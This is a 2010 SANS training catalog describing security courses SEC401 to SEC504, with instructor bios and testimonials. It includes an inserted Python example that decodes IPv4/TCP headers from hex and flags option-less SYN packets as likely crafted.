GIAC Certification (www.giac.org) • DoD 8570 Required (www.sans.org/8570) • STI Masters Program (www.sans.edu) • Cyber Guardian Program (www.sans.org/cyber-guardian)

Security Essentials is our most popular training program. We strongly recommend you attend the evening bootcamp sessions with hands-on exercises. These require the dedication to really put in the hours, but they can help you fill in the gaps in your information security knowledge. Everyone, except truly seasoned hands-on information security workers, can benefit from SANS Security Essentials Bootcamp Style. A GSEC Certification can add 6-9% to your bottom line salary.

401.1 Hands On: Networking Concepts
Day one teaches you how networks, routers, firewalls, and the related protocols like TCP/IP work so you’ll be better prepared to determine hostile traffic and have a foundation for the succeeding days’ training.
Topics: Network Fundamentals; IP Concepts; IP Behavior; IOS and Router Filters; Physical Security; Bootcamp

401.2 Hands On: Defense In Depth
Day two covers security threats and their impact, including information warfare. It also covers sound security policies and password management tools, the six steps of incident handling, and Web server security testing.
Topics: Defense in Depth; Security Policy and Contingency Planning; Access Control and Password Management; Incident Response; Information Warfare; Web Communications and Security; Bootcamp

401.3 Hands On: Internet Security Technologies
Day three gives you a roadmap that will help you understand the tools and options available for deploying systems for defense.
Topics: Attack Strategies and Mitigation; Vulnerability Scanning; Intrusion Detection Technologies; Intrusion Prevention Technologies; IT Risk Management; Bootcamp

401.4 Hands On: Secure Communications
Day four covers encryption, wireless security, and operations security.
Topics: Encryption 101; Encryption 102; Applying Cryptography; Wireless Network Security; VoIP; Operations Security; Bootcamp

401.5 Hands On: Windows Security
Day five is all about securing the current batch of Windows operating systems (Windows XP/2003/Vista/2008/Windows 7) and teaches the tools that simplify and automate the process.
Topics: Windows Security Infrastructure; Permissions and User Rights; Security Templates and Group Policy; Service Packs, Hotfixes, and Backups; Securing Windows Network Services; Automation and Auditing; Bootcamp

401.6 Hands On: Linux Security
Based on industry consensus standards, this course provides step-by-step guidance on improving the security of any Linux system. The course combines practical how-to instructions with background information for Linux beginners and security advice and “best practices” for administrators of all levels of expertise.
Topics: Linux Landscape; Linux Command Line; Linux OS Security; Linux Security Tools; Maintenance, Monitoring and Auditing Linux

“One of the top instructors I have had. Keeping me in a room for 12 hours and holding my attention is impressive.”
-ANDREW FISHER, USAF

Register at www.sans.org/network-security-2010

SANS Faculty Fellow Eric Cole, PhD
Dr. Eric Cole is an industry-recognized security expert with over 15 years of hands-on experience. Cole currently performs leading-edge security consulting and works in research and development to advance the state of the art in information systems security. Cole has experience in information technology with a focus on perimeter defense, secure network design, vulnerability discovery, penetration testing, and intrusion detection systems. Cole has a master’s degree in computer science from NYIT and a PhD from Pace University with a concentration in information security. Dr. Cole is the author of several books, including Hackers Beware, Hiding in Plain Sight, Network Security Bible, and Insider Threat. He is the inventor of over 20 patents and is a researcher, writer, and speaker. He is also a member of the Commission on Cyber Security for the 44th President and several executive advisory boards. Dr. Cole is also the CTO of the Americas for McAfee. Cole is actively involved with the SANS Technology Institute (STI) and SANS, working with students, teaching, and maintaining and developing courseware. He is a SANS faculty fellow and course author.
SECURITY 501

Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: James Tarala

Who Should Attend
• Students who have taken Security Essentials and want a more advanced 500-level course similar to SEC401
• People who have foundational knowledge covered in SEC401, do not want to take a specialized 500-level course, and still want broad advanced coverage of the core areas to protect their systems
• Anyone looking for detailed technical knowledge on how to protect against, detect, and react to the new threats that will continue to cause harm to an organization

Cyber security will continue to increase in importance as attacks become stealthier, have a greater financial impact on an organization, and cause reputational damage.

While Security Essentials lays a solid foundation for the security practitioner, there is only so much that can be packed into a six-day course. SEC501 is a follow-up to SEC401: SANS Security Essentials (with no overlap) and continues to focus on more technical areas needed to protect an organization. The course focus is on:

Prevention - configuring a system or network correctly
Detection - identifying that a breach has occurred at the system or network level
Reaction - responding to an incident and moving to evidence collection/forensics

Prevention is ideal, but detection is a must. We have to ensure that we constantly improve security to prevent as many attacks as possible. This prevention/protection occurs externally and internally. Attacks will continue to pose a threat to an organization as data becomes more portable and networks continue to be porous. Therefore a key focus needs to be on data protection – securing our critical information whether it resides on a server, in a robust network architecture, or on a portable device.

Despite our best effort at preventing attacks and protecting critical data, some attacks will still be successful. Therefore we need to be able to detect attacks in a timely fashion. This is accomplished by understanding the traffic flowing on your networks and looking for indications of an attack. It also includes performing penetration testing and vulnerability analysis against an organization to identify problems and issues before a compromise occurs.

Finally, once an attack has been detected, we must react in a timely fashion and perform forensics. By understanding how the attacker broke in, this knowledge can be fed back into more effective and robust preventive and detective measures, completing the security lifecycle.

AUTHOR STATEMENT
It is always a thrill after I finish teaching SEC401 to see students leave with a fire in their eyes and an excitement about them. They walked into class feeling overwhelmed that security is a lost cause, but they leave class understanding what they need to do and have a focus and drive to do the right thing to secure their organizations. However the next question we receive on a constant basis is, what course should I take next? How do I continue my journey? Well, it depends on what your focus area is. Do you want to get more into perimeter protection, IDS, operating system security, etc? The challenge is that many students have positions that do not allow them to focus on one area – they need to understand all of the key areas across security. What students are telling us is that they want a Security Essentials part 2 or a 500-level continuation of Security Essentials covering the next level of technical knowledge. In Security 501, SANS has decided to give students just what they have been asking for, and I am beyond thrilled with the results. We have identified core foundation areas that complement SEC401 with no overlap and continue to build a solid security foundation for network practitioners.
-Eric Cole, PhD

“Really enjoyed all of the hands-on work. Real life scenarios are always good.”
-ERIC LUELLEN, MURRAY STATE
GIAC Certification (www.giac.org)

“This was a great class. The instructor had great high energy and kept things moving!”
-MICHELLE HERD, UNIVERSITY OF DENVER

501.1 Hands On: Defensive Network Infrastructure
Protecting a network from attack starts with designing, building, and implementing a robust network infrastructure. Many aspects of implementing a defense-in-depth network are often overlooked since companies focus on functionality. Achieving the proper balance between business drivers and core protection of information is difficult. On the first day students will learn how to design and implement a functionality-rich, secure network and how to maintain and update it as the threat landscape evolves.
Topics: Introducing Network Infrastructure as Targets for Attack; Implementing the Cisco Gold Standard to Improve Security; Advanced Layer 2 and 3 Controls

501.2 Hands On: Packet Analysis
Packet analysis and intrusion detection are at the core of timely detection. Detecting attacks is becoming more difficult as attacks become stealthier and more difficult to find. Only by understanding the core principles of traffic analysis can one become a skilled analyst and distinguish normal traffic from attack traffic. Security professionals must be able to detect new, advanced zero-day attacks before they compromise a network. Prevention, detection, and reaction must all be closely knit so that once an attack is detected, defensive measures can be adapted, proactive forensics implemented, and the organization can continue to operate.
Topics: Architecture Design & Preparing Filters; Detection Techniques and Measures; Advanced IP Packet Analysis; Intrusion Detection Tools

501.3 Hands On: Pentest
An organization must understand the changing threat landscape and compare that against its own vulnerabilities. On day three students will understand the variety of tests that can be run and how to perform penetration testing in an effective manner. Students will learn about external and internal pen testing and the methods of black, gray, and white box testing. Penetration testing is critical to identify an organization’s exposure points, but students will also learn how to prioritize and fix these vulnerabilities to increase the overall security of an organization.
Topics: Variety of Penetration Testing Methods; Vulnerability Analysis; Key Tools and Techniques; Basic Pen Testing; Advanced Pen Testing

501.4 Hands On: First Responder
Any organization connected to the Internet or with employees is going to have attacks launched against it. Security professionals need to understand how to perform incident response, analyze what is occurring, and restore their organization back to a normal state as soon as possible. Day four will equip students with a proven six-step process to follow in response to an attack - prepare, identify, contain, eradicate, recover, and learn from previous incidents. Students will learn how to perform forensic investigation and find indications of an attack. This information will be fed into the incident response process and ensure the attack is prevented from occurring again in the future.
Topics: Incident Handling Process and Analysis; Forensics and Incident Response

501.5 Hands On: Malware
As security professionals continue to build more proactive security measures, attackers’ methods will continue to evolve. A common way for attackers to target, control, and break into as many systems as possible is through the use of malware. Therefore it is critical that students understand what type of malware is currently available to attackers and future trends and methods of exploiting systems. With this knowledge students can then learn how to analyze, defend against, and detect malware on systems and minimize the impact to the organization.
Topics: Malware; Microsoft Malware; External Tools and Analysis

501.6 Hands On: Data Loss Prevention
Cyber security is all about managing, controlling, and mitigating risk to critical assets, which in almost every organization are composed of data or information. Perimeters are still important, but we are moving away from a fortress model and moving towards a focus on data. This is based on the fact that information no longer solely resides on servers where properly configured access control lists can limit access and protect our information; it can now be copied to laptops and plugged into networks. Data must be protected no matter where it resides.
Topics: Risk Management; Data Classification; Digital Rights Management; Data Loss Prevention (DLP)

Register at www.sans.org/network-security-2010

Senior Instructor James Tarala
James Tarala is a principal consultant with Enclave Hosting, LLC and is based out of Venice, Florida. He is a regular speaker and senior instructor with the SANS Institute as well as a courseware author and editor for many SANS auditing and security courses. As a consultant, he has spent the past few years architecting large enterprise IT security and infrastructure, specifically working with many Microsoft-based directory services, e-mail, terminal services, and wireless technologies. He has also spent a large amount of time consulting with organizations to assist them in their security management, operational practices, and regulatory compliance issues and often performs independent security audits and assists internal audit groups to develop their programs. James completed his undergraduate studies at Philadelphia Biblical University and his graduate work at the University of Maryland. He also holds numerous professional certifications.
SANS Network Security 2010
September 19 - 29, 2010 47
SECURITY 502: Perimeter Protection In-Depth
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
6 CPE Credits/Day • Laptop Required • Instructor: Dave Shackleford

Who Should Attend
• Information security officers
• Intrusion analysts
• IT managers
• Network architects
• Network security engineers
• Network and system administrators
• Security managers
• Security analysts
• Security architects
• Security auditors

There is no single fix for securing your network. That's why this course is a comprehensive analysis of a wide breadth of technologies. This is probably the most diverse course in the SANS catalog, as mastery of multiple security techniques is required to defend your network from remote attacks. You cannot just focus on a single OS or security appliance. A proper security posture comprises multiple layers. This course was developed to give you the knowledge and tools necessary at every layer to ensure your network is secure.

The course starts by looking at common problems: Is there traffic passing by my firewall I didn't expect? How did my system get compromised when no one can connect to it from the Internet? Is there a better solution than anti-virus for controlling malware? We'll dig into these questions and more and answer them.

We all know how to assign an IP address, but to secure your network you really need to understand the idiosyncrasies of the protocol. We'll talk about how IP works and how to spot abnormal patterns. If you can't hear yourself saying "Hmm, there are no TCP options in that packet. It's probably forged," then you'll gain some real insight from this portion of the material.

Once you have an understanding of the complexities of IP, we'll get into how to control it on the wire. We focus on the underlying technology used by all of the products rather than telling you which are good and which are bad. A side-by-side product comparison is only useful for that specific moment in time. By gaining knowledge of what goes on under the covers, you will be empowered to make good product choices for years to come. Just because two firewalls are stateful inspection, do they really work the same on the wire? Is there really any difference between stateful inspection and network-based intrusion prevention, or is it just marketing? These are the types of questions we address in this portion of the course.

We move on to a proper, wire-level assessment of a potential product, as well as what options and features are available. We'll even get into how to deploy traffic control while avoiding some of the most common mistakes. Feel like your firewall is generating too many daily entries for you to review the logs effectively? We'll address this problem not by reducing the amount of critical data, but by streamlining and automating the back-end process of evaluating it.

But you can't do it all on the wire. A properly layered defense needs to include each individual host: not just the hosts exposed to access from the Internet, but hosts that have any kind of direct or indirect Internet communication capability as well. We'll start with OS lockdown techniques and move on to third-party tools that can permit you to do anything from sandboxing insecure applications to full-blown application policy enforcement.

Most significantly, I've developed this course material using the following guiding principles: learn the process, not just one specific product; you learn more by doing, so hands-on problem solving is key; always peel back the layers and identify the root cause. While technical knowledge is important, what really matters is the skill to properly leverage it. This is why the course is heavily focused on problem solving and root cause analysis. While these are usually considered soft skills, they are vital to being an effective security architect. So along with the technical training, you'll receive risk management capabilities and even a bit of Zen empowerment.

AUTHOR STATEMENT
One of the things I love seeing in my students is the little light bulbs going on over their heads. I think a lot of people walk into the class thinking, "Hey, I've been running a PIX or Firewall-1 firewall for a few years – I already know this perimeter stuff," and they are blown away by how much they learn. A single line of defense was cool eight years ago. Today, attackers as well as their exploits are so sophisticated that a single line of security is no longer up to the task. In this class students learn about each layer that can be implemented to keep the attackers at bay. I've recently added to the course a ton of hands-on labs. Each technology really helps to solidify the student's comfort zone. You learn about IDS and then immediately go hands-on with it in class. You learn about vulnerability checking and again, set up a scanner in class and start checking the reports. In many ways, this is probably the most difficult SANS class to master, as the knowledge learned is so diverse. Each technology is a required skill, however, if you are going to lock down your organization's perimeter. -Chris Brenton

GIAC Certification (www.giac.org) • Cyber Guardian Program (www.sans.org/cyber-guardian)

Perimeter Protection In-Depth is suited for anyone wanting to become a firewall administrator or perimeter designer. This course is also fantastic for auditors and consultants. Junior firewall administrators earn from $35,000 to $55,000. More experienced firewall administrators can go up to $90,000 or more. Consultants tend to earn 20 - 30% more than people with similar experience levels working inside organizations if they can maintain a steady flow of work. Respected technical certifications, like the GCFW and GCIA, can really help make a consultant stand out from the crowd.

502.1 TCP/IP for Firewalls
This first section is more than an executive overview, as we dig down into the bits and bytes of the problem. What can be secured at the network level, and which protection needs to be pushed back to the hosts? What are my packet-level control devices really doing on the wire, and when can't I trust them? If you want to control traffic on the wire, you have to understand the IP protocol. It is for this reason that a majority of the day is spent doing packet-level analysis. While many protocol analyzers will tell you what they think is happening, if you cannot read the decodes for yourself, you will have no idea when the tool is leading you astray.
Topics: Common Threats; Windump/Tcpdump; OSI Layer 2; OSI Layer 3; Fragmentation; OSI Layers 4 through 6; IP Version 6 (IPv6)

502.2 Hands On: Firewalls, NIDS, and NIPS
The only way to understand if a network traffic control device is going to meet your requirements is to understand the technology underneath the hood. Do all stateful inspection firewalls handle traffic the same way? Is there really any difference between a stateful inspection firewall and a network-based intrusion prevention system (NIPS)? In today's material we will cut through the vendor marketing slicks and look at what their products are really capable of doing.
Topics: Static Packet Filters; Stateful Packet Filters; Stateful Inspection Filtering; Intrusion Detection and Prevention; Proxies; Cisco IOS

502.3 Hands On: Wire Products and Assessments
In today's material we will look at how each vendor has implemented the technology. We'll also discuss how to test these products on the wire so we know exactly how they are impacting traffic. Can the product stop a covert communication channel using ICMP error packets? What about a source route attack? These are the types of questions we'll strive to answer in this material. The number one problem students have with managing their environment is dealing with the firewall logs. Not only will we discuss what to look for, but through practical exercises you will learn how to optimize the log review process into something that takes less time to finish than your morning coffee.
Topics: Commercial Traffic Control Products; Open Source Traffic Control Products; Building a Firewall Rulebase; Perimeter Assessment; Firewall Log Analysis

502.4 Hands On: Host-Level Security
In the early days of the Internet it was possible to secure a network right at the perimeter. Modern-day attacks, however, are far more advanced and require a multi-layered approach to security. This does not mean the perimeter no longer serves a useful role, just that it is only part of the equation. So today we focus on the security posture of our individual hosts, look at what the OS vendors give us to work with, and when we may need to turn to third-party tools. It is not enough to simply configure the hosts securely and hope for the best. So we will also look at vulnerability scanning and audits in order to be able to validate continuous integrity. When the worst occurs, we'll talk about performing a forensic analysis as well. Finally, we will talk about security information management. The devices on your network really want to tell you what is going on, but you have to be able to sort through all of the data. We'll look at options for both daily reports as well as real-time alerting.
Topics: Securing Hosts and Services; Host-Based Intrusion Detection and Prevention; Vulnerability Assessment and Auditing; Forensics; Security Information Management

502.5 Hands On: Securing the Wire
It's not enough to control traffic flow; we also need to be able to secure the data inside of the packets. We will start with the basics, authentication and encryption, and learn how these technologies are combined into the modern-day VPN. We'll discuss which of the technologies have been proven to be mathematically secure and which of them are a leap of faith. Further, we will discuss how to integrate encrypted dataflows into your overall architecture design so you are not blinded to attacks through these encrypted tunnels. Then we turn our attention to securing the internal network structure. We'll cover deploying wireless access points without creating (yet another) point of management. We'll also look at network access control (NAC) and discuss what it can do today as well as its potential in the future.
Topics: Authentication; Encryption; VPNs; Wireless; Network Access Control

502.6 Hands On: Perimeter Wrap-Up
The problems start off easy, like small organizations that need advice in order to make their environment more secure. The complexity quickly escalates to where you need to combine security, functionality, and political issues into the design. A healthy dose of risk assessment is also thrown in for good measure. You will also perform a series of labs that are hostile in nature. A majority of the previous labs were geared towards problem solving: you will be presented with a security issue and then given a hands-on process for resolving it.
Topics: Sizing Up a Network; Cool Tools

Certified Instructor: Dave Shackleford
Dave Shackleford, Director of Security Assessments and Risk & Compliance at Sword & Shield Enterprise Security, is a SANS Analyst, instructor, and GIAC technical director. He has consulted with hundreds of organizations in the areas of regulatory compliance, security, and network architecture and engineering. He's worked as CSO for Configuresoft, CTO for the Center for Internet Security, and has also worked as a security architect, analyst, and manager for several Fortune 500 companies.

"The expertise of the trainer is impressive, real life situations explained, very good manuals. Best training ever!" -JERRY ROBLES DE MEDINA GODO, CU

SECURITY 503: Intrusion Detection In-Depth
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: Mike Poor

Who Should Attend
• Intrusion detection analysts (all levels)
• Network engineers
• System, security, and network administrators
• Hands-on security managers

Learn practical, hands-on intrusion detection and traffic analysis from top practitioners/authors in the field.

This is the most advanced network intrusion detection program that has ever been taught. All of the course material is either new or just updated to reflect the latest attack patterns. This series is jam-packed with network traces and analysis tips. The emphasis is on increasing students' understanding of the workings of TCP/IP and hex, methods of network traffic analysis, and one specific network intrusion detection system: Snort. This course is not a comparison or demonstration of multiple NIDS. Instead, the knowledge provided here allows students to better understand the qualities that go into a sound NIDS and the "whys" behind them, and thus to be better equipped to make a wise selection for their site's particular needs.

This is a fast-paced course and students are expected to have a basic working knowledge of TCP/IP (see www.sans.org/training/tcpip_quiz.php) in order to fully understand the topics that will be discussed. Although others may benefit, this course is most appropriate for students who are or will become intrusion detection analysts. Students generally range from novices with some TCP/IP background all the way to seasoned analysts. The challenging, hands-on exercises are specially designed for all experience levels. We strongly recommend that you spend some time getting familiar with TCPdump, WINdump, or another network analyzer's output before coming to class.

PREREQUISITE
You must possess at least a working knowledge of TCP/IP and hex. See www.sans.org/training/tcpip_quiz.php to test your TCP/IP and hex basics knowledge.

AUTHOR STATEMENT
Guy Bruneau, Mike Poor, and I have worked as intrusion analysts for many years. Over the years, we have seen our fair share of attacks and suspicious traffic often leading to intrusions. Over time, we have developed various analysis techniques that work on new detects, and we have learned how to pass those on to the students. Attendees will learn how TCP/IP really works from instructors who have spent thousands of hours analyzing, researching, and categorizing suspicious traffic with a variety of security tools. You will learn from hundreds of old and current examples of detects that were captured in the real world and be able to apply these real-world examples to analyze known and new intrusion patterns. We are confident that students will put the training they receive from this course into practice the day they get back to the office. -Stephen Northcutt, Guy Bruneau, and Mike Poor

"This class heightens your security awareness on protecting your network and provides excellent examples, in detail, on how to accomplish this." -LAURA FREEMAN, DND

GIAC Certification (www.giac.org) • DoD 8570 Required (www.sans.org/8570) • STI Masters Program (www.sans.edu) • Cyber Guardian Program (www.sans.org/cyber-guardian)

Intrusion Detection In-Depth is one of our most advanced and challenging courses. People with GCIA certifications have an advantage over other security job candidates and often land some of the most interesting jobs in information security. Their salaries range from $50,000 to well into six figures.

503.1 TCP/IP for Intrusion Detection
Diligent students will be able to translate native hexadecimal at the IP and transport layers and be able to decode DNS. The material presented in this course will equip students with the knowledge and understanding of TCP/IP and free tools like TCPdump and WINdump to assist them in troubleshooting all types of networking complaints, from routing problems to firewall and critical server issues.
Topics: TCPdump Review; TCP/IP Communication Model; IP Fragmentation; ICMP; Stimulus and Response; Microsoft Networking and Security; Domain Name System; Routing; IPSec; IPv6

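The skill that 503.1 (translating raw hex at the IP and transport layers) and the Security 502 description (noticing that a SYN with no TCP options is probably forged) both point at, shown as an added example that is not SANS course material: a small Python decoder that takes an IPv4/TCP packet as a hex string, decodes the header fields by hand, splits out the TCP options, and then applies the no-options heuristic. The two packets are constructed for this example (a normal SYN from a real stack carrying MSS, NOP, NOP, SACK-permitted, and a bare 20-byte SYN with data offset 5 of the kind packet-crafting tools emit by default); the heuristic is an analyst rule of thumb, not a guarantee, and the code says so in its note text.

```python
"""Decode an IPv4/TCP header from hex and flag SYNs that carry no TCP options.

Added example for the 502/503.1 material; not SANS courseware. The two sample
packets below are constructed by hand for this example (20-byte IPv4 header,
checksums left at zero because they are not verified here)."""
import struct

# Bit order of the TCP flags byte (byte 13 of the TCP header), LSB first.
TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR"]

# Constructed sample: ordinary SYN 192.168.1.100:50000 -> 10.0.0.1:80,
# data offset 7 (28-byte header), options MSS=1460, NOP, NOP, SACK-permitted.
NORMAL_SYN = (
    "45 00 00 30 1c 46 40 00 40 06 00 00 c0 a8 01 64 0a 00 00 01 "
    "c3 50 00 50 00 00 00 01 00 00 00 00 70 02 fa f0 00 00 00 00 "
    "02 04 05 b4 01 01 04 02"
)
# Constructed sample: bare SYN 10.0.0.2:1234 -> 10.0.0.1:22, data offset 5,
# no options at all, the shape a packet crafter produces unless told otherwise.
CRAFTED_SYN = (
    "45 00 00 28 00 01 00 00 40 06 00 00 0a 00 00 02 0a 00 00 01 "
    "04 d2 00 16 00 00 00 00 00 00 00 00 50 02 04 00 00 00 00 00"
)


def parse_ipv4(raw: bytes) -> dict:
    """Decode the fixed IPv4 header (RFC 791); the payload starts at IHL*4."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl:
        raise ValueError("bad IHL")
    return {
        "ihl": ihl, "total_len": total_len, "id": ident, "ttl": ttl, "proto": proto,
        "df": bool(flags_frag & 0x4000), "mf": bool(flags_frag & 0x2000),
        "frag_offset": (flags_frag & 0x1FFF) * 8,
        "src": ".".join(str(b) for b in src), "dst": ".".join(str(b) for b in dst),
        "payload": raw[ihl:],
    }


def parse_tcp(raw: bytes) -> dict:
    """Decode the TCP header (RFC 793); options sit between byte 20 and the data offset."""
    if len(raw) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_res, flags, win, _csum, _urg = \
        struct.unpack("!HHIIBBHHH", raw[:20])
    data_off = (off_res >> 4) * 4
    if data_off < 20 or len(raw) < data_off:
        raise ValueError("bad data offset")
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack, "window": win,
        "flags": [n for i, n in enumerate(TCP_FLAG_NAMES) if flags & (1 << i)],
        "options": raw[20:data_off], "payload": raw[data_off:],
    }


def parse_tcp_options(opts: bytes) -> list:
    """Split TCP option bytes into (kind, value) pairs; EOL and NOP are single bytes."""
    out, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                      # End of option list
            break
        if kind == 1:                      # NOP padding
            out.append((1, b""))
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated option")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        out.append((kind, opts[i + 2:i + length]))
        i += length
    return out


def analyze(hexdump: str) -> dict:
    """Decode a hex IPv4/TCP packet and attach analyst notes for crafted-packet signs."""
    raw = bytes.fromhex("".join(hexdump.split()))
    ip = parse_ipv4(raw)
    notes = []
    if ip["total_len"] != len(raw):
        notes.append("IP total length does not match the captured bytes")
    if ip["proto"] != 6:
        return {"ip": ip, "tcp": None, "options": [], "notes": notes + ["not TCP"]}
    tcp = parse_tcp(ip["payload"])
    opts = parse_tcp_options(tcp["options"])
    if "SYN" in tcp["flags"] and "ACK" not in tcp["flags"]:
        if not opts:
            notes.append("SYN with no TCP options: real stacks send at least MSS; probably crafted")
        if tcp["payload"]:
            notes.append("SYN carrying payload: unusual for a real stack")
    return {"ip": ip, "tcp": tcp, "options": opts, "notes": notes}


if __name__ == "__main__":
    for label, pkt in (("normal", NORMAL_SYN), ("crafted", CRAFTED_SYN)):
        r = analyze(pkt)
        print(label, r["ip"]["src"], "->", r["ip"]["dst"], r["tcp"]["dport"],
              r["tcp"]["flags"], r["options"], r["notes"])
```

Feed it the hex that tcpdump -x prints for a SYN and you get the same decode the course asks you to do by hand; the heuristic only fires on a SYN without ACK, since a SYN/ACK from a stack that was offered no options will legitimately carry none either.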
503.2 Hands On – Part 1: Network Traffic Analysis Using TCPdump*
In the first day of this two-day module, students will learn how to interpret every single field in a packet. We will build on that skill to learn traffic analysis with lab exercises to reinforce the theory. TCPdump is the tool of choice selected to demonstrate the theory and is used in hands-on exercises. The intent of this course is to free the analyst from relying exclusively on the NIDS to do packet interpretation.
Topics: Introduction to TCPdump; Writing TCPdump Filters; TCPdump Filters; Examining Datagram Fields with TCPdump

503.3 Hands On – Part 2: Network Traffic Analysis Using TCPdump*
In this section of the class, we combine lectures with hands-on exercises to give you the foundation and knowledge to return to your site and use TCPdump to do real-world analysis of your network traffic.
Topics: Examining Datagram Fields with TCPdump; Analysis of TCPdump Output; Advanced Analysis

503.4 Hands On: Intrusion Detection Snort Style*
On day four we will install, configure, and use the powerful and versatile freeware intrusion detection system Snort on either Linux or Windows. In addition, you will learn to customize Snort for many special uses. Hands-on exercises that will challenge both the novice and the seasoned Snort user are included so that students will feel confident in their ability to effectively utilize Snort for their site's specific needs when they get back to the office.
Topics: Introduction; Modes of Operation; Writing Snort Rules; Configuring Snort as an IDS; Output Analysis; Advanced Topics

503.5 Hands On – Part 1: Security Information Management and Traffic Analysis*
This day starts to bring together the knowledge gained on previous days to help you become a combat-ready analyst. You'll learn how to assess and prioritize the events generated by an IDS/IPS, including how to correlate events across multiple platforms and operating environments. You'll participate in analyzing and decoding host and network logging data, identifying patterns in attacker activity taken from live, hostile networks.
Topics: Traffic Patterns and Analysis; Interoperability and Standards in Intrusion Detection; Passive Analysis Techniques; IDS/IPS Architecture and Implementation Techniques; Common Analyst Tools; Event Correlation and Common Attack Techniques

503.6 Hands On – Part 2: Security Information Management and Traffic Analysis*
On the final day, you will use all of the knowledge gained and be exposed to a barrage of scans, reconnaissance techniques, and network exploits used by the attack community. Hands-on participation in decoding and analyzing hostile activity from a honeypot will prepare the student to assess IDS/IPS alerts and logging information on their own network after completing this exercise.
Topics: "The Challenge Hands-On Exercise"; Identifying Crafted Packets; In-Depth Protocol Analysis; Common Errors and How to Avoid Them; Advanced Analysis Profiling Techniques; Reducing False Positives; Identifying Denial-of-Service Activity

*This course is available to Security 503 participants only.

Senior Instructor: Mike Poor
Mike is a founder and senior security analyst for the DC firm InGuardians LLC. In his recent past life he has worked for Sourcefire as a research engineer and for the SANS Institute leading their intrusion analysis team. As a consultant, Mike conducts forensic analysis, penetration tests, vulnerability assessments, security audits, and architecture reviews. His primary job focus, however, is in intrusion detection, response, and mitigation. Mike currently holds both GSEC and GCIA certifications and is an expert in network engineering and systems, network, and Web administration. Mike is an author of the international best-selling book Snort 2.1 from Syngress and is a handler for the Internet Storm Center.

"This course is great for network defenders as well as penetration testers to understand some of what they are up against." -JAY BROWN, GD-IT
SECURITY 504: Hacker Techniques, Exploits, and Incident Handling
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: John Strand

Who Should Attend
• Incident handlers
• Leaders of incident handling teams
• System administrators who are on the front lines defending their systems and responding to attacks
• Other security personnel who are first responders when systems come under attack

If your organization has an Internet connection or a disgruntled employee (and whose doesn't!), your computer systems will get attacked.

From the five, ten, or even one hundred daily probes against your Internet infrastructure to the malicious insider slowly creeping through your most vital information assets to the spyware your otherwise wholesome users inadvertently downloaded, attackers are targeting your systems with increasing viciousness and stealth.

By helping you understand attackers' tactics and strategies in detail, giving you hands-on experience in finding vulnerabilities and discovering intrusions, and equipping you with a comprehensive incident handling plan, the in-depth information helps you turn the tables on computer attackers. This course addresses the latest cutting-edge insidious attack vectors, the 'oldie-but-goodie' attacks that are still so prevalent, and everything in between. Instead of merely teaching a few hack attack tricks, this course includes a time-tested, step-by-step process for responding to computer incidents; a detailed description of how attackers undermine systems so you can prepare for, detect, and respond to them; and a hands-on workshop for discovering holes before the bad guys do. This workshop also includes the unique SANS Capture-the-Flag event on the last day where you will apply the skills developed throughout the session to match wits with your fellow students and instructor in a fun and engaging learning environment. You'll get to attack the systems in our lab and capture the flags to help make the lessons from the whole week more concrete.

Additionally, the course explores the legal issues associated with responding to computer attacks, including employee monitoring, working with law enforcement, and handling evidence.

This challenging course is particularly well suited to individuals who lead or are a part of an incident handling team. Furthermore, general security practitioners, system administrators, and security architects will benefit by understanding how to design, build, and operate their systems to prevent, detect, and respond to attacks.

It is imperative that you get written permission from the proper authority in your organization before using these tools and techniques on your company's systems, and also that you advise your network and computer operations teams of your testing.

AUTHOR STATEMENT
My favorite part of teaching Hacker Techniques, Exploits, and Incident Handling is watching students when they finally "get it." It's usually a two-stage process. First, students begin to realize how truly malicious some of these attacks are. Some students have a very visceral reaction, occasionally shouting out "Oh, shoot!" when they see what the bad guys are really up to. But if I stopped the process at that point, I'd be doing a disservice. The second stage is even more fun. Later in the class, students gradually realize that even though the attacks are really nasty, they can prevent, detect, and respond to them. Using the knowledge they gain in this course, they know they'll be ready when a bad guy launches an attack against their systems. And being ready to thwart the bad guys is what it's all about. - Ed Skoudis

GIAC Certification (www.giac.org) • DoD 8570 Required (www.sans.org/8570) • STI Masters Program (www.sans.edu) • Cyber Guardian Program (www.sans.org/cyber-guardian)
Hacker Techniques, Exploits, and Incident Handling is a challenging course particularly well suited to individuals who lead or are a part of an incident handling team or are penetration testers or RED TEAM members. It focuses on how to detect malicious code and how to respond. High-end incident handlers and penetration testers earn top dollar in the industry.

504.1 Incident Handling Step-by-Step and Computer Crime Investigation
This session describes a detailed incident handling process and applies that process to several in-the-trenches case studies. Additionally, in the evening an optional 'Intro to Linux' mini-workshop will be held. This session provides the introductory Linux skills you'll need to participate in exercises throughout the rest of SEC504. If you are new to Linux, attending this evening session is crucial.
Topics: Preparation; Identification; Containment; Eradication; Recovery; Special Actions for Responding to Different Types of Incidents; Incident Record Keeping; Incident Follow-Up

504.2 Hands On – Part 1: Computer and Network Hacker Exploits*
It is imperative that system administrators and security professionals know how to control what outsiders can see. Students who take this class and master the material can expect to learn the skills to identify potential targets and be provided the tools they need to test their systems effectively for vulnerabilities. This day covers the first two steps of many hacker attacks: reconnaissance and scanning.
Topics: Reconnaissance; Scanning; Intrusion Detection System Evasion; Hands-on Exercises with a List of Tools

504.3 Hands On – Part 2: Computer and Network Hacker Exploits*
